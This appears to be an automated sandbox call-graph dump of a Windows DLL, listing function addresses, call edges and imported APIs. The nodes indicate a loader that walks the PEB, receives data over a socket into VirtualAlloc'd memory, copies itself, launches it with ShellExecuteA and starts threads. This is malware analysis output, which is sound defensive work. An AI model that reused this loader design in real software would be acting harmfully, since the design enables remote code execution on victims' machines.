__DllMainCRTStartup@12 11426->11427 11428 1001126f memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11427->11428 11429 10011352 __DllMainCRTStartup@12 11428->11429 11429->11405 10720 1000109e 10721 10010b09 _Error_objects 2 API calls 10720->10721 10722 100010a3 10721->10722 10629 1000b020 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10630 1000b080 10629->10630 10631 1000b04c ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10629->10631 10633 1000b078 Concurrency::task_continuation_context::task_continuation_context 10630->10633 10634 1000c120 2 API calls 10630->10634 10631->10630 10632 1000b064 ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10631->10632 10632->10633 10635 1000b09b 10634->10635 10636 1000b0a5 10635->10636 10644 1000b0e1 _Error_objects 10635->10644 10654 10003e80 fgetc 10636->10654 10638 1000b0f0 fgetc 10639 1000b109 Concurrency::task_continuation_context::task_continuation_context 10638->10639 10638->10644 10641 100020a0 2 API calls 10639->10641 10640 1000bc00 Concurrency::task_continuation_context::task_continuation_context 10 API calls 10640->10644 10641->10633 10642 1000b15e ?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD 10642->10644 10643 1000b198 10645 1000b233 10643->10645 10649 1000b1a2 Concurrency::task_continuation_context::task_continuation_context 10643->10649 10644->10638 10644->10640 10644->10642 10644->10643 10647 1000b1af 10644->10647 10656 1000c960 10644->10656 10648 100020a0 2 API calls 10645->10648 10651 1000b1f4 10647->10651 10652 1000b1cf ungetc 10647->10652 10648->10633 10650 100020a0 2 API calls 10649->10650 10650->10633 10653 100020a0 2 API calls 10651->10653 10652->10647 10653->10633 10655 10003e9a 10654->10655 10655->10633 10657 10002cf0 ?_Xout_of_range@std@@YAXPBD 10656->10657 10658 1000c97b 10657->10658 10661 1000cc00 10658->10661 10662 1000cc1f Concurrency::task_continuation_context::task_continuation_context 10661->10662 10665 10002d50 memmove 10662->10665 10664 1000c98b 10664->10644 10665->10664 10723 1000b4a0 10724 1000b4b3 Concurrency::task_continuation_context::task_continuation_context 10723->10724 10725 1000b4d4 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10724->10725 10741 1000b4c3 Concurrency::task_continuation_context::task_continuation_context 10724->10741 10726 1000b4e1 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10725->10726 10727 1000b51e 10725->10727 10726->10727 10728 1000b4f9 10726->10728 10729 1000c120 2 API calls 10727->10729 10727->10741 10731 1000b502 ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10728->10731 10730 1000b539 10729->10730 10732 1000b543 10730->10732 10733 1000b58b 10730->10733 10731->10741 10742 10003eb0 fputc 10732->10742 10734 1000b59b ?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD 10733->10734 10735 1000b5e9 10734->10735 10736 1000b5db 10734->10736 10739 1000b5f6 fwrite 10735->10739 10735->10741 10736->10735 10738 1000b5e1 10736->10738 10740 10003eb0 fputc 10738->10740 10738->10741 10739->10741 10740->10741 10743 10003ecb 10742->10743 10743->10741 11298 10004220 11299 100042cb _Error_objects 11298->11299 11300 1000cd10 10 API calls 11299->11300 11301 1000431d 11300->11301 11302 10004020 5 API calls 11301->11302 11303 1000432f 11302->11303 11304 10002190 8 API calls 11303->11304 11305 10004341 11304->11305 11306 100020a0 2 API calls 11305->11306 11307 1000436b 11306->11307 11308 1000b970 2 API calls 11307->11308 11309 1000437a 11308->11309 11430 1000b2a0 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11431 1000b2b7 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11430->11431 11433 1000b2e3 Concurrency::task_continuation_context::task_continuation_context 11430->11433 11432 1000b2cf ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11431->11432 11431->11433 11432->11433 11476 1000ab20 11477 1000ab85 11476->11477 11478 1000ab32 Concurrency::task_continuation_context::task_continuation_context 11476->11478 11478->11477 11479 1000ab71 fflush 11478->11479 11479->11477 11644 2871520 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11437 100102a9 11438 1001025a 11437->11438 11439 10010229 recv 11438->11439 11440 100102e8 VirtualAlloc memmove 11438->11440 11443 10010276 realloc 11438->11443 11439->11438 11441 100102a1 11439->11441 11442 1001031d 11440->11442 11444 100102a7 11441->11444 11445 100102ab closesocket WSACleanup free exit 11441->11445 11443->11438 11444->11440 11445->11442 11480 10010b2c 11481 10010b46 11480->11481 11482 10010b3e 11480->11482 11483 10010b1e _MallocaArrayHolder free 11482->11483 11483->11481 10744 100010b0 10745 100010c2 10744->10745 10747 100010d0 10744->10747 10746 1000114e DefWindowProcW 10745->10746 10745->10747 10746->10747 11128 1000bdb0 11129 1000b6e0 9 API calls 11128->11129 11130 1000bdbf 11129->11130 11131 1000bdd2 11130->11131 11132 10010b1e _MallocaArrayHolder free 11130->11132 11132->11131 11446 1000aeb0 11447 1000aebf 11446->11447 11448 1000aef3 ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11447->11448 11449 1000aed9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J 11447->11449 11450 1000aec7 11447->11450 11451 1000af66 11448->11451 11452 1000af17 _Min_value 11448->11452 11449->11450 11451->11450 11454 1000c120 2 API calls 11451->11454 11453 1000af24 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11452->11453 11461 10002ac0 memmove 11453->11461 11456 1000af7b 11454->11456 11458 1000afd7 11456->11458 11459 1000af8b fread 11456->11459 11457 1000af43 ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 11457->11451 11458->11450 11460 1000afdd fread 11458->11460 11459->11450 11459->11456 11460->11450 11461->11457 11462 1000b6b0 11463 1000b6d0 11462->11463 11464 1000b6c0 _lock_file 11462->11464 11464->11463 10748 2861a37 10749 2861a58 GetModuleHandleA CreateWindowExW 10748->10749 10750 2861a49 10748->10750 10756 2861abb SendMessageW 10749->10756 10751 2861a53 NtdllDefWindowProc_W 10750->10751 10752 2861b29 PostQuitMessage 10750->10752 10755 2861b4c 10751->10755 10752->10755 10757 2861ae5 10756->10757 10758 2861b09 CreateThread 10757->10758 10758->10755 10759 10001b80 79 API calls 10758->10759 9534 2860032 9544 2860ae4 GetPEB 9534->9544 9537 2860ae4 GetPEB 9540 28602a7 9537->9540 9538 28604a6 GetNativeSystemInfo 9539 28604d3 VirtualAlloc 9538->9539 9541 2860a9c 9538->9541 9542 28604ec 9539->9542 9540->9538 9540->9541 9542->9541 9546 10010610 9542->9546 9545 286029b 9544->9545 9545->9537 9551 10010450 9546->9551 9552 10010479 9551->9552 9583 10010380 GetModuleFileNameA 9552->9583 9554 1001048c 9595 10010080 9554->9595 9558 100104d3 9601 100020a0 9558->9601 9560 1001055c 9561 10010582 9560->9561 9562 10010564 9560->9562 9564 10010330 9 API calls 9561->9564 9563 100020a0 2 API calls 9562->9563 9565 10010570 9563->9565 9566 1001058e 9564->9566 9567 100020a0 2 API calls 9565->9567 9569 100105a5 CopyFileA 9566->9569 9568 1001057f GetCurrentThread WaitForSingleObject CreateThread CreateThread 9567->9568 9577 10001170 LoadLibraryW GetProcAddress GetProcAddress 9568->9577 9819 100048c0 9568->9819 10059 100100c0 WSAStartup getaddrinfo 9568->10059 9570 100020a0 2 API calls 9569->9570 9571 100105b7 ShellExecuteA 9570->9571 9604 10001830 GetModuleHandleA 9571->9604 9574 100020a0 2 API calls 9575 100105e3 9574->9575 9576 100020a0 2 API calls 9575->9576 9576->9568 9578 100011c2 GetModuleHandleA RegisterClassW CreateWindowExW 9577->9578 9580 10001245 exit 9578->9580 9581 10001247 GetMessageW 9578->9581 9580->9541 9581->9580 9582 1000125b TranslateMessage DispatchMessageW 9581->9582 9582->9581 9634 10002190 9583->9634 9588 100103e7 9642 10001ec0 9588->9642 9589 10010419 9592 100020a0 2 API calls 9589->9592 9594 10010414 9592->9594 9593 100020a0 2 API calls 9593->9594 9594->9554 9688 10010030 9595->9688 9598 10010330 GetModuleFileNameA 9599 10002190 8 API calls 9598->9599 9600 10010363 9599->9600 9600->9558 9693 10002620 9601->9693 9603 100020af 9603->9560 9605 10002190 8 API calls 9604->9605 9606 10001873 9605->9606 9703 100016e0 9606->9703 9610 100018a1 9611 100020a0 2 API calls 9610->9611 9612 100018ac 9611->9612 9613 100020a0 2 API calls 9612->9613 9614 100018be 9613->9614 9715 10001600 9614->9715 9618 100018f3 9731 10002f30 9618->9731 9620 10001918 9621 100020c0 2 API calls 9620->9621 9622 1000192c 9621->9622 9623 100020a0 2 API calls 9622->9623 9624 10001937 9623->9624 9625 100020a0 2 API calls 9624->9625 9626 10001946 9625->9626 9627 100020a0 2 API calls 9626->9627 9628 10001958 RegisterClassW 9627->9628 9629 10001750 17 API calls 9628->9629 9630 100019db CreateWindowExW ShowWindow 9629->9630 9631 10001a14 KiUserCallbackDispatcher 9630->9631 9632 10001a28 TranslateMessage DispatchMessageW 9631->9632 9633 10001a3f 9631->9633 9632->9631 9633->9574 9635 100021c1 HandleT _Error_objects 9634->9635 9646 100030f0 9635->9646 9637 100021ea 9638 10001f00 9637->9638 9639 10001f12 Concurrency::task_continuation_context::task_continuation_context 9638->9639 9670 10002fd0 9639->9670 9641 10001f45 9641->9588 9641->9589 9643 10001ed8 _Error_objects 9642->9643 9682 10002990 9643->9682 9647 10003107 Concurrency::task_continuation_context::task_continuation_context 9646->9647 9649 10003111 Concurrency::task_continuation_context::task_continuation_context 9647->9649 9657 100015e0 ?_Xlength_error@std@@YAXPBD 9647->9657 9650 1000313b 9649->9650 9652 10003187 Concurrency::task_continuation_context::task_continuation_context 9649->9652 9658 10002ac0 memmove 9650->9658 9659 10003aa0 9652->9659 9654 100031ae HandleT Concurrency::task_continuation_context::task_continuation_context 9662 10002ac0 memmove 9654->9662 9656 1000315f HandleT Concurrency::task_continuation_context::task_continuation_context 9656->9637 9657->9649 9658->9656 9663 10003bb0 9659->9663 9662->9656 9666 10003c00 9663->9666 9667 10003c10 allocator 9666->9667 9668 10003c30 allocator 6 API calls 9667->9668 9669 10003ac5 9668->9669 9669->9654 9671 10002fe3 9670->9671 9675 1000302f _Min_value 9670->9675 9671->9675 9676 100030a0 memset 9671->9676 9673 10002ff8 9673->9675 9677 10003a20 9673->9677 9675->9641 9676->9673 9678 10003a2c _Min_value 9677->9678 9680 10003a76 9677->9680 9678->9680 9681 10003b20 memchr 9678->9681 9680->9675 9681->9678 9683 100029c5 9682->9683 9684 10002cf0 ?_Xout_of_range@std@@YAXPBD 9683->9684 9685 100029de Concurrency::task_continuation_context::task_continuation_context 9684->9685 9686 100030f0 8 API calls 9685->9686 9687 10001eed 9686->9687 9687->9593 9692 1000ece0 9688->9692 9690 1001004d __stdio_common_vsprintf 9691 10010069 9690->9691 9691->9598 9692->9690 9694 10002637 Concurrency::task_continuation_context::task_continuation_context 9693->9694 9696 10002668 Concurrency::task_continuation_context::task_continuation_context 9694->9696 9697 10002c80 9694->9697 9696->9603 9700 10002e00 9697->9700 9701 10003550 allocator 2 API calls 9700->9701 9702 10002cab 9701->9702 9702->9696 9704 10001f00 2 API calls 9703->9704 9705 100016fc 9704->9705 9706 10001705 9705->9706 9707 10001728 9705->9707 9708 10001ec0 9 API calls 9706->9708 9734 10002210 9707->9734 9710 1000171a 9708->9710 9711 100020c0 9710->9711 9712 100020d2 HandleT Concurrency::task_continuation_context::task_continuation_context 9711->9712 9713 10002620 2 API calls 9712->9713 9714 100020da 9712->9714 9713->9714 9714->9610 9752 100022b0 9715->9752 9717 1000163b SHGetKnownFolderPath 9718 100016b7 9717->9718 9719 1000166a wcstombs 9717->9719 9754 10002080 9718->9754 9720 10002190 8 API calls 9719->9720 9722 10001692 9720->9722 9724 100020c0 2 API calls 9722->9724 9723 100016c4 9728 10002f00 9723->9728 9725 100016a1 9724->9725 9726 100020a0 2 API calls 9725->9726 9727 100016a9 CoTaskMemFree 9726->9727 9727->9723 9783 10002010 9728->9783 9730 10002f17 9730->9618 9815 10002040 9731->9815 9733 10002f47 9733->9620 9735 1000223c HandleT Concurrency::task_continuation_context::task_continuation_context 9734->9735 9738 10003230 9735->9738 9737 1000228e 9737->9710 9739 10003247 Concurrency::task_continuation_context::task_continuation_context 9738->9739 9741 10003251 Concurrency::task_continuation_context::task_continuation_context 9739->9741 9749 100015e0 ?_Xlength_error@std@@YAXPBD 9739->9749 9742 1000327b 9741->9742 9744 100032ab Concurrency::task_continuation_context::task_continuation_context 9741->9744 9750 10002ac0 memmove 9742->9750 9745 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9744->9745 9747 100032d2 HandleT Concurrency::task_continuation_context::task_continuation_context 9745->9747 9746 1000329d Concurrency::task_continuation_context::task_continuation_context 9746->9737 9751 10002ac0 memmove 9747->9751 9749->9741 9750->9746 9751->9746 9753 100022e1 _Error_objects 9752->9753 9753->9717 9757 100026b0 9754->9757 9758 100026c0 HandleT 9757->9758 9761 10002bc0 9758->9761 9760 10002093 9760->9723 9762 10002bd4 Concurrency::task_continuation_context::task_continuation_context 9761->9762 9763 10002c18 9761->9763 9767 10002d50 memmove 9762->9767 9768 10003480 9763->9768 9766 10002bf9 Concurrency::task_continuation_context::task_continuation_context 9766->9760 9767->9766 9769 10003491 Concurrency::task_continuation_context::task_continuation_context 9768->9769 9771 1000349b Concurrency::task_continuation_context::task_continuation_context 9769->9771 9778 100015e0 ?_Xlength_error@std@@YAXPBD 9769->9778 9772 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9771->9772 9773 100034cc HandleT Concurrency::task_continuation_context::task_continuation_context 9772->9773 9779 10002c40 9773->9779 9775 10003509 9776 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 9775->9776 9777 10003523 Concurrency::task_continuation_context::task_continuation_context 9775->9777 9776->9777 9777->9766 9778->9771 9782 10002ac0 memmove 9779->9782 9781 10002c5a Concurrency::task_continuation_context::task_continuation_context 9781->9775 9782->9781 9784 10002020 HandleT 9783->9784 9787 100026e0 9784->9787 9786 10002039 9786->9730 9788 10002700 Concurrency::task_continuation_context::task_continuation_context 9787->9788 9789 1000274d 9787->9789 9793 10002d50 memmove 9788->9793 9794 10003360 9789->9794 9792 1000272b Concurrency::task_continuation_context::task_continuation_context 9792->9786 9793->9792 9795 10003380 Concurrency::task_continuation_context::task_continuation_context 9794->9795 9797 1000338d Concurrency::task_continuation_context::task_continuation_context 9795->9797 9807 100015e0 ?_Xlength_error@std@@YAXPBD 9795->9807 9798 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9797->9798 9799 100033c7 HandleT Concurrency::task_continuation_context::task_continuation_context 9798->9799 9800 10003447 9799->9800 9801 100033fc HandleT 9799->9801 9802 10002780 memmove 9800->9802 9808 10002780 9801->9808 9806 1000343a Concurrency::task_continuation_context::task_continuation_context 9802->9806 9804 10003429 9805 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 9804->9805 9805->9806 9806->9792 9807->9797 9813 10002ac0 memmove 9808->9813 9810 1000279a 9814 10002ac0 memmove 9810->9814 9812 100027b1 Concurrency::task_continuation_context::task_continuation_context 9812->9804 9813->9810 9814->9812 9816 1000205a Concurrency::task_continuation_context::task_continuation_context 9815->9816 9817 100026e0 11 API calls 9816->9817 9818 1000206d 9817->9818 9818->9733 9820 100048f8 9819->9820 9821 10002190 8 API calls 9820->9821 9822 1000490e 9821->9822 10077 100046a0 GetModuleFileNameA 9822->10077 9824 10004921 _Smanip _Error_objects 10111 1000b990 9824->10111 9826 10004f87 _Smanip _Error_objects 9827 1000b990 10 API calls 9826->9827 9828 100098a2 9827->9828 10115 10004540 9828->10115 9831 10004540 10 API calls 9832 100098d3 _Error_objects 9831->9832 10121 10004120 9832->10121 10060 10010139 WSACleanup exit 10059->10060 10070 10010152 10059->10070 10061 1001031d 10060->10061 10062 100101f5 freeaddrinfo 10064 10010209 WSACleanup exit 10062->10064 10072 10010222 10062->10072 10063 1001016d socket 10065 10010196 WSACleanup exit 10063->10065 10066 100101af connect 10063->10066 10064->10061 10065->10061 10067 100101d3 closesocket 10066->10067 10068 100101ee 10066->10068 10067->10070 10068->10062 10069 10010229 recv 10071 100102a1 10069->10071 10069->10072 10070->10062 10070->10063 10074 100102a7 10071->10074 10075 100102ab closesocket WSACleanup free exit 10071->10075 10072->10069 10073 10010276 realloc 10072->10073 10076 100102e8 VirtualAlloc memmove 10072->10076 10073->10072 10074->10076 10075->10061 10076->10061 10078 10002190 8 API calls 10077->10078 10079 100046e8 10078->10079 10080 10001ec0 9 API calls 10079->10080 10081 10004716 10080->10081 10082 10001ec0 9 API calls 10081->10082 10083 1000472f 10082->10083 10185 1000ba80 10083->10185 10086 10001ec0 9 API calls 10087 1000475a 10086->10087 10088 10001ec0 9 API calls 10087->10088 10092 10004773 _Error_objects 10088->10092 10089 100047da 10195 1000d1d0 10089->10195 10092->10089 10189 1000bd90 10092->10189 10192 1000bd70 10092->10192 10095 10002f30 11 API calls 10096 10004815 10095->10096 10097 100020a0 2 API calls 10096->10097 10098 10004830 10097->10098 10099 100020a0 2 API calls 10098->10099 10100 1000483c 10099->10100 10101 100020a0 2 API calls 10100->10101 10102 1000484b 10101->10102 10103 100020a0 2 API calls 10102->10103 10104 1000485a 10103->10104 10105 100020a0 2 API calls 10104->10105 10106 10004866 10105->10106 10107 100020a0 2 API calls 10106->10107 10108 10004875 10107->10108 10109 100020a0 2 API calls 10108->10109 10110 10004884 10109->10110 10110->9824 10112 1000b9b0 HandleT 10111->10112 10241 1000d590 10112->10241 10114 1000b9e9 10114->9826 10116 10004571 _Error_objects 10115->10116 10275 1000bb30 10116->10275 10118 10004595 HandleT 10119 100045dd 10118->10119 10120 1000bc00 Concurrency::task_continuation_context::task_continuation_context 10 API calls 10118->10120 10119->9831 10120->10118 10122 1000414a 10121->10122 10307 1000b910 10122->10307 10124 10004168 10127 1000421b _Error_objects 10124->10127 10313 1000b950 10124->10313 10316 1000cd10 10127->10316 10128 10004237 10131 1000b950 10 API calls 10128->10131 10129 1000426c 10132 1000b950 10 API calls 10129->10132 10131->10127 10134 1000429c 10132->10134 10133 1000431d 10320 10004020 MultiByteToWideChar 10133->10320 10135 1000b950 10 API calls 10134->10135 10135->10127 10186 1000ba92 Concurrency::task_continuation_context::task_continuation_context 10185->10186 10201 1000d6f0 10186->10201 10190 10002010 11 API calls 10189->10190 10191 1000bda3 10190->10191 10191->10092 10208 1000bc00 10192->10208 10194 1000bd84 10194->10092 10196 1000d1e5 Concurrency::task_continuation_context::task_continuation_context 10195->10196 10198 1000d208 10196->10198 10230 100015e0 ?_Xlength_error@std@@YAXPBD 10196->10230 10231 1000df80 10198->10231 10200 100047f1 10200->10095 10202 10004742 10201->10202 10203 1000d6fe 10201->10203 10202->10086 10203->10202 10206 10003b20 memchr 10203->10206 10207 1000e0e0 memcmp 10203->10207 10206->10203 10207->10203 10209 1000bc64 10208->10209 10211 1000bc1d Concurrency::task_continuation_context::task_continuation_context 10208->10211 10212 1000d8a0 10209->10212 10211->10194 10213 1000d8c0 Concurrency::task_continuation_context::task_continuation_context 10212->10213 10215 1000d8cd Concurrency::task_continuation_context::task_continuation_context 10213->10215 10225 100015e0 ?_Xlength_error@std@@YAXPBD 10213->10225 10216 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10215->10216 10217 1000d907 HandleT Concurrency::task_continuation_context::task_continuation_context 10216->10217 10218 1000d984 10217->10218 10219 1000d93c HandleT 10217->10219 10220 1000bc90 Concurrency::task_continuation_context::task_continuation_context memmove 10218->10220 10226 1000bc90 10219->10226 10223 1000d977 Concurrency::task_continuation_context::task_continuation_context 10220->10223 10222 1000d966 10224 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10222->10224 10223->10211 10224->10223 10225->10215 10229 10002ac0 memmove 10226->10229 10228 1000bcaa Concurrency::task_continuation_context::task_continuation_context 10228->10222 10229->10228 10230->10198 10236 1000dfac HandleT Concurrency::task_continuation_context::task_continuation_context 10231->10236 10232 1000e042 HandleT Concurrency::task_continuation_context::task_continuation_context 10239 10002ac0 memmove 10232->10239 10234 1000e08a 10240 10002ac0 memmove 10234->10240 10236->10232 10238 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10236->10238 10237 1000e0a1 Concurrency::task_continuation_context::task_continuation_context 10237->10200 10238->10232 10239->10234 10240->10237 10242 1000d5b6 Concurrency::task_continuation_context::task_continuation_context 10241->10242 10243 1000d630 Concurrency::task_continuation_context::task_continuation_context 10242->10243 10249 1000dc50 10242->10249 10243->10114 10250 1000dc5f 10249->10250 10251 1000dc69 10250->10251 10263 1000c520 ?_Xlength_error@std@@YAXPBD 10250->10263 10264 1000e150 10251->10264 10255 1000e7b0 10256 1000e7d4 HandleT 10255->10256 10268 1000eb90 10256->10268 10258 1000d611 10259 1000daf0 10258->10259 10260 1000db09 10259->10260 10261 1000daff 10259->10261 10260->10243 10271 1000c540 10261->10271 10263->10251 10265 1000e183 Concurrency::task_continuation_context::task_continuation_context 10264->10265 10266 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10265->10266 10267 1000d5e9 10266->10267 10267->10255 10269 1000eb9f 10268->10269 10270 1000ebbd memmove 10269->10270 10270->10258 10273 1000c566 Concurrency::task_continuation_context::task_continuation_context 10271->10273 10272 1000c5c9 10272->10260 10273->10272 10274 10002e00 allocator 2 API calls 10273->10274 10274->10272 10276 1000bb44 10275->10276 10277 1000bb46 10275->10277 10276->10118 10277->10276 10278 1000bb5e 10277->10278 10280 1000bb8c Concurrency::task_continuation_context::task_continuation_context 10277->10280 10282 1000d790 10278->10282 10280->10276 10295 1000c660 10280->10295 10283 1000d7b0 Concurrency::task_continuation_context::task_continuation_context 10282->10283 10284 1000d7bd Concurrency::task_continuation_context::task_continuation_context 10283->10284 10301 100015e0 ?_Xlength_error@std@@YAXPBD 10283->10301 10286 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10284->10286 10287 1000d7f7 HandleT Concurrency::task_continuation_context::task_continuation_context 10286->10287 10288 1000d82c HandleT 10287->10288 10289 1000d86f 10287->10289 10302 1000bbb0 10288->10302 10290 1000bbb0 memmove 10289->10290 10294 1000d862 Concurrency::task_continuation_context::task_continuation_context 10290->10294 10293 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10293->10294 10294->10276 10296 1000c677 HandleT Concurrency::task_continuation_context::task_continuation_context 10295->10296 10306 10002ac0 memmove 10296->10306 10298 1000c6b3 Concurrency::task_continuation_context::task_continuation_context 10299 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10298->10299 10300 1000c6d5 10299->10300 10300->10276 10301->10284 10305 10002ac0 memmove 10302->10305 10304 1000bbcb 10304->10293 10305->10304 10306->10298 10308 1000b91f 10307->10308 10309 1000b936 10308->10309 10312 1000b943 10308->10312 10326 1000c520 ?_Xlength_error@std@@YAXPBD 10308->10326 10327 1000d430 10309->10327 10312->10124 10343 1000d520 10313->10343 10315 10004209 10315->10127 10315->10128 10315->10129 10318 1000cd45 HandleT 10316->10318 10317 1000cd82 _Error_objects 10317->10133 10318->10317 10363 1000e3a0 10318->10363 10384 10010b54 10320->10384 10326->10309 10328 1000d45d Concurrency::task_continuation_context::task_continuation_context 10327->10328 10329 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10328->10329 10330 1000d48f 10329->10330 10335 1000e4c0 10330->10335 10336 1000e4e4 HandleT 10335->10336 10337 1000eb90 memmove 10336->10337 10338 1000d4b5 10337->10338 10339 1000dbb0 10338->10339 10341 1000dbc1 Concurrency::task_continuation_context::task_continuation_context 10339->10341 10340 1000d502 10340->10312 10341->10340 10342 10002e00 allocator 2 API calls 10341->10342 10342->10340 10344 1000d553 10343->10344 10346 1000d545 10343->10346 10347 1000e5f0 10344->10347 10346->10315 10348 1000e61d Concurrency::task_continuation_context::task_continuation_context 10347->10348 10349 1000e65f 10348->10349 10362 1000c520 ?_Xlength_error@std@@YAXPBD 10348->10362 10351 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10349->10351 10352 1000e685 HandleT 10351->10352 10353 1000e6f6 10352->10353 10354 1000e6d8 10352->10354 10356 1000e4c0 memmove 10353->10356 10355 1000e4c0 memmove 10354->10355 10359 1000e6f1 10355->10359 10357 1000e70d 10356->10357 10358 1000e4c0 memmove 10357->10358 10358->10359 10360 1000dbb0 2 API calls 10359->10360 10361 1000e791 10360->10361 10361->10346 10362->10349 10364 1000e3cc Concurrency::task_continuation_context::task_continuation_context 10363->10364 10366 1000e40c Concurrency::task_continuation_context::task_continuation_context 10364->10366 10373 100015e0 ?_Xlength_error@std@@YAXPBD 10364->10373 10367 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10366->10367 10369 1000e42f Concurrency::task_continuation_context::task_continuation_context 10366->10369 10367->10369 10374 1000eb40 10369->10374 10370 1000e47b Concurrency::task_continuation_context::task_continuation_context 10377 1000ea90 10370->10377 10373->10366 10381 1000ecb0 10374->10381 10378 1000e4ae 10377->10378 10379 1000ea9f 10377->10379 10378->10317 10380 10002620 2 API calls 10379->10380 10380->10378 10382 1000eb90 memmove 10381->10382 10383 1000eb54 10382->10383 10383->10370 11133 2870b33 11134 2870b36 11133->11134 11135 2870b87 __DllMainCRTStartup@12 2 API calls 11134->11135 11136 2870b44 __DllMainCRTStartup@12 11134->11136 11135->11136 11645 100113b5 11648 100116df 11645->11648 11649 100113c3 _except_handler4_common 11648->11649 11484 1000e739 11485 1000e74a 11484->11485 11486 10002e00 allocator 2 API calls 11485->11486 11487 1000e75d _CxxThrowException 11486->11487 10760 1000d4ba 10761 10002e00 allocator 2 API calls 10760->10761 10762 1000d4cc _CxxThrowException 10761->10762 11311 1000463a 11312 1000cde0 22 API calls 11311->11312 11313 1000464b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 11312->11313 11314 10002190 8 API calls 11313->11314 11315 1000466c 11314->11315 10763 1000d0bc 10764 1000d0c3 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 10763->10764 10765 1000be70 3 API calls 10764->10765 10766 1000d0f9 10765->10766 10845 1001153c 10846 10011545 IsProcessorFeaturePresent 10845->10846 10847 10011544 10845->10847 10849 10011587 10846->10849 10852 1001154a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10849->10852 10851 1001166a 10852->10851 10666 10001040 10669 10004000 10666->10669 10672 10003f30 10669->10672 10675 1000cc90 10672->10675 10676 1000cca3 10675->10676 10679 1000e370 10676->10679 10678 10001051 10682 1000cc80 10679->10682 10681 1000e38d memset 10681->10678 10682->10681 10683 10001440 10688 10001470 10683->10688 10687 10001462 10694 100013f0 10688->10694 10691 10010b1e 10698 100113e4 10691->10698 10697 10001300 __std_exception_destroy 10694->10697 10696 100013ff 10696->10687 10696->10691 10697->10696 10699 10011691 free 10698->10699 10767 100014c0 10770 100014f0 10767->10770 10773 100012c0 __std_exception_copy 10770->10773 10772 100014d3 10773->10772 11488 28701c7 11489 2870131 11488->11489 11502 287017b 11488->11502 11490 2870144 socket 11489->11490 11491 28701cc FreeAddrInfoW 11489->11491 11492 2870186 connect 11490->11492 11493 287016d WSACleanup 11490->11493 11494 28701e0 WSACleanup 11491->11494 11498 28701f9 11491->11498 11495 28701c5 11492->11495 11496 28701aa closesocket 11492->11496 11493->11502 11494->11502 11495->11491 11496->11489 11497 2870200 recv 11497->11498 11498->11497 11499 2870282 closesocket WSACleanup 11498->11499 11500 287027e 11498->11500 11501 28702bf VirtualAlloc 11498->11501 11498->11502 11499->11498 11500->11501 11501->11502 10700 286f2c4 CloseHandle 10701 286f2f8 10700->10701 10774 100024cb 10775 100024d3 Concurrency::task_continuation_context::task_continuation_context 10774->10775 10777 100024da _Error_objects Concurrency::task_continuation_context::task_continuation_context 10775->10777 10778 10002ae0 memmove 10775->10778 10778->10777 11655 2871549 IsProcessorFeaturePresent 11656 287155e 11655->11656 11659 2871521 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11656->11659 11658 2871641 11659->11658 11503 1000b350 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11504 1000b36b ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11503->11504 11509 1000b3ef Concurrency::task_continuation_context::task_continuation_context 11503->11509 11506 1000b383 Concurrency::task_continuation_context::task_continuation_context 11504->11506 11504->11509 11505 1000b3e2 Concurrency::task_continuation_context::task_continuation_context 11507 1000b3d0 ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11506->11507 11508 1000b39c ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11506->11508 11507->11505 11512 1000b3bd 11508->11512 11509->11505 11510 1000b459 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11509->11510 11516 10003ef0 ungetc 11509->11516 11510->11505 11511 1000b46c 11510->11511 11518 1000c0c0 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11511->11518 11512->11507 11512->11509 11517 10003f0d 11516->11517 